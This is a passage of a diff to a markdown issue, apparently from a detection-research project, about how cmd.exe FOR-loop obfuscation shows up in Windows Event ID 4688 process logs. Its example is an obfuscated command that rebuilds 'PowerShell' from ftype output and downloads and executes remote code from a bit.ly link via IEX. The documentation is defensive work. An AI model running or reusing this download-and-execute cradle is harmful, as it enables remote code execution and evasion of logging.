zinint/OSCD_Invoke-DOSfuscation/OSCD - Issue - DOSfuscation.md

 ```
 So this subtype of binary obfuscation is considered out of scope for this Issue.

-#### For Loop Value Extraction
+#### For Loop
-The same as Environment Variable Substrings in the last child Process Creation WEL Security Event ID 4688 existing environment variables resolve to their underlying value.
+The same as with Environment Variable Substrings if you use For Loop then in the last child Process Creation WEL Security Event ID 4688 existing environment variables resolve to their underlying value.
 E.g. if we'll use this example command:
 ```CMD
 C:\>cmd /c "FOR /F "delims=6M. tokens=2" %Z IN ('ftype^|findstr lMo')DO %Z IEX (New-Object Net.WebClient).DownloadString('http://bit.ly/L3g1t')"